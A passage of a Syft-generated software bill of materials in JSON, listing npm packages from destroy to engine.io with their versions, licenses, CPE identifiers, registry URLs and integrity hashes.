ype":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:destroy:destroy:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/destroy@1.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz","integrity":"sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==","dependencies":null}},{"id":"cd3c75639d40cfa6","name":"detect-libc","version":"2.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:detect-libc:detect-libc:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:detect-libc:detect_libc:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:detect_libc:detect-libc:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:detect_libc:detect_libc:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:detect:detect-libc:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:detect:detect_libc:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/detect-libc@2.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz","integrity":"sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==","dependencies":null}},{"id":"32140b01170f2db8","name":"dfa","version":"1.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:dfa:dfa:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/dfa@1.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz","integrity":"sha512-ED3jP8saaweFTjeGX8HQPjeC1YYyZs98jGNZx6IiBvxW7JG5v492kamAQB3m2wop07CvU/RQmzcKr6bgcC5D/Q==","dependencies":null}},{"id":"88295af7ba0997fd","name":"didyoumean","version":"1.2.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:didyoumean:didyoumean:1.2.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/didyoumean@1.2.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/didyoumean/-/didyoumean-1.2.2.tgz","integrity":"sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw==","dependencies":null}},{"id":"7a3b023286e84986","name":"dijkstrajs","version":"1.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:dijkstrajs:dijkstrajs:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/dijkstrajs@1.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.3.tgz","integrity":"sha512-qiSlmBq9+BCdCA/L46dw8Uy93mloxsPSbwnm5yrKn2vMPiy8KyAskTF6zuV/j5BMsmOGZDPs7KjU+mjb670kfA==","dependencies":null}},{"id":"6145214b9f2f7148","name":"dlv","version":"1.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:dlv:dlv:1.1.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/dlv@1.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/dlv/-/dlv-1.1.3.tgz","integrity":"sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA==","dependencies":null}},{"id":"22b93db9f5eba040","name":"dom-helpers","version":"5.2.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:dom-helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom-helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom_helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom_helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom:dom-helpers:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom:dom_helpers:5.2.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/dom-helpers@5.2.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz","integrity":"sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA==","dependencies":{"@babel/runtime":"^7.8.7","csstype":"^3.0.2"}}},{"id":"f8e1d8922cf56c54","name":"dom-serializer","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:dom-serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom-serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom_serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom_serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom:dom-serializer:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dom:dom_serializer:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/dom-serializer@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz","integrity":"sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==","dependencies":{"domelementtype":"^2.3.0","domhandler":"^5.0.2","entities":"^4.2.0"}}},{"id":"5df6e95fb09fce0c","name":"domelementtype","version":"2.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-2-Clause","spdxExpression":"BSD-2-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:domelementtype:domelementtype:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/domelementtype@2.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/domelementtype/-/domelementtype-2.3.0.tgz","integrity":"sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw==","dependencies":null}},{"id":"952037d890bc80f6","name":"domhandler","version":"5.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-2-Clause","spdxExpression":"BSD-2-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:domhandler:domhandler:5.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/domhandler@5.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz","integrity":"sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==","dependencies":{"domelementtype":"^2.3.0"}}},{"id":"1b9db533b6297450","name":"domutils","version":"3.2.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-2-Clause","spdxExpression":"BSD-2-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:domutils:domutils:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/domutils@3.2.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/domutils/-/domutils-3.2.2.tgz","integrity":"sha512-6kZKyUajlDuqlHKVX1w7gyslj9MPIXzIFiz/rGu35uC1wMi+kMhQwGhl4lt9unC9Vb9INnY9Z3/ZA3+FhASLaw==","dependencies":{"dom-serializer":"^2.0.0","domelementtype":"^2.3.0","domhandler":"^5.0.3"}}},{"id":"23d9641db70f3051","name":"dunder-proto","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:dunder-proto:dunder-proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dunder-proto:dunder_proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dunder_proto:dunder-proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dunder_proto:dunder_proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dunder:dunder-proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:dunder:dunder_proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/dunder-proto@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz","integrity":"sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==","dependencies":{"call-bind-apply-helpers":"^1.0.1","es-errors":"^1.3.0","gopd":"^1.2.0"}}},{"id":"91c59a4a431b283f","name":"duplexify","version":"4.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:duplexify:duplexify:4.1.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/duplexify@4.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/duplexify/-/duplexify-4.1.3.tgz","integrity":"sha512-M3BmBhwJRZsSx38lZyhE53Csddgzl5R7xGJNk7CVddZD6CcmwMCH8J+7AprIrQKH7TonKxaCjcv27Qmf+sQ+oA==","dependencies":{"end-of-stream":"^1.4.1","inherits":"^2.0.3","readable-stream":"^3.1.1","stream-shift":"^1.0.2"}}},{"id":"e7e9dd6a07994e54","name":"eastasianwidth","version":"0.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:eastasianwidth:eastasianwidth:0.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/eastasianwidth@0.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz","integrity":"sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==","dependencies":null}},{"id":"4ed0ded14e893339","name":"ecdsa-sig-formatter","version":"1.0.11","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ecdsa-sig-formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ecdsa-sig-formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ecdsa_sig_formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ecdsa_sig_formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ecdsa-sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ecdsa-sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ecdsa_sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ecdsa_sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ecdsa:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ecdsa:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/ecdsa-sig-formatter@1.0.11","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz","integrity":"sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==","dependencies":{"safe-buffer":"^5.0.1"}}},{"id":"122ede063714b5b3","name":"editorconfig","version":"1.0.7","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:editorconfig:editorconfig:1.0.7:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/editorconfig@1.0.7","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/editorconfig/-/editorconfig-1.0.7.tgz","integrity":"sha512-e0GOtq/aTQhVdNyDU9e02+wz9oDDM+SIOQxWME2QRjzRX5yyLAuHDE+0aE8vHb9XRC8XD37eO2u57+F09JqFhw==","dependencies":{"@one-ini/wasm":"0.1.1","commander":"^10.0.0","minimatch":"^9.0.1","semver":"^7.5.3"}}},{"id":"e40c9e2062507e8a","name":"ee-first","version":"1.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ee-first:ee-first:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ee-first:ee_first:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ee_first:ee-first:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ee_first:ee_first:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ee:ee-first:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ee:ee_first:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/ee-first@1.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz","integrity":"sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow==","dependencies":null}},{"id":"dc02d9fca5801675","name":"electron-to-chromium","version":"1.5.345","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:electron-to-chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:electron-to-chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:electron_to_chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:electron_to_chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:electron-to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:electron-to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:electron_to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:electron_to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:electron:electron-to-chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:electron:electron_to_chromium:1.5.345:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/electron-to-chromium@1.5.345","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.345.tgz","integrity":"sha512-F9JXQGiMrz6yVNPI2qOVPvB9HzjH5cGzhs8oJ6A28V5L/YnzN/0KsuiibqF+F1Fd9qxFzD1BUnYSd8JfULxTwg==","dependencies":null}},{"id":"20a2cf9e55a512fb","name":"emoji-regex","version":"10.6.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:emoji-regex:emoji-regex:10.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji-regex:emoji_regex:10.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji_regex:emoji-regex:10.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji_regex:emoji_regex:10.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji:emoji-regex:10.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji:emoji_regex:10.6.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/emoji-regex@10.6.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/emoji-regex/-/emoji-regex-10.6.0.tgz","integrity":"sha512-toUI84YS5YmxW219erniWD0CIVOo46xGKColeNQRgOzDorgBi1v4D71/OFzgD9GO2UGKIv1C3Sp8DAn0+j5w7A==","dependencies":null}},{"id":"6d4a27855f2a5940","name":"emoji-regex","version":"8.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:emoji-regex:emoji-regex:8.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji-regex:emoji_regex:8.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji_regex:emoji-regex:8.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji_regex:emoji_regex:8.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji:emoji-regex:8.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji:emoji_regex:8.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/emoji-regex@8.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz","integrity":"sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==","dependencies":null}},{"id":"6d104925e5745212","name":"emoji-regex","version":"9.2.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:emoji-regex:emoji-regex:9.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji-regex:emoji_regex:9.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji_regex:emoji-regex:9.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji_regex:emoji_regex:9.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji:emoji-regex:9.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:emoji:emoji_regex:9.2.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/emoji-regex@9.2.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz","integrity":"sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==","dependencies":null}},{"id":"c88c25f6c6e59773","name":"encodeurl","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:encodeurl:encodeurl:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/encodeurl@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz","integrity":"sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==","dependencies":null}},{"id":"2e1781643534e89c","name":"end-of-stream","version":"1.4.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:end-of-stream:end-of-stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:end-of-stream:end_of_stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:end_of_stream:end-of-stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:end_of_stream:end_of_stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:end-of:end-of-stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:end-of:end_of_stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:end_of:end-of-stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:end_of:end_of_stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:end:end-of-stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:end:end_of_stream:1.4.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/end-of-stream@1.4.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz","integrity":"sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==","dependencies":{"once":"^1.4.0"}}},{"id":"560e37438ce30be1","name":"engine.io","version":"6.6.7